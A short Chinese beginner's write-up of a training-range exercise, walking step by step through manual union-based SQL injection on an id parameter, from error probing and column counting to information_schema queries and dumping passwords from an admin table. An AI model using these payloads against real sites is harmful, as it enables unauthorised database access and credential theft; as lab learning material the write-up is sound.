1、发现页面中存在一个链接,点击打开看看url会发生什么变化。
2、出现?id=1,我们可以假设这里是通过传参来获取数据库的数据。
3、尝试在后面加上一个 ’ 来判断这个位置是否有注入点,结果出现错误。
4、再尝试在?id=1后面添加and 1 = 1,发现网页正常,确定此处为注入点。
5、通过再?id=1后面添加order by+数字 从1开始依次增大,到3时发生错误,数据为空,最终确认字段数为2。
6、改为id = 2,内容为空,尝试通过页面回显。
7、union select 1,version(),回显版本为5.5.53
8、union select 1,database() 爆出数据库名
9、利用5.0以上版本mysql特点,分别回显出数据库的各表表名、以及各表的列名,寻找密码相关字段。
union select 1,group_concat(table_name) from information_schema.tables where table_schema = 库名
union select 1,group_concat(column_name) from information_schema.columns where table_name = 表名
10、根据表名和确定的密码字段名,回显密码!
union select 1,password from admin
结尾特此感谢在我艰难完成第一篇靶场WP的过程中,为我这个小白指点迷津的老师和同学。。。。。
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.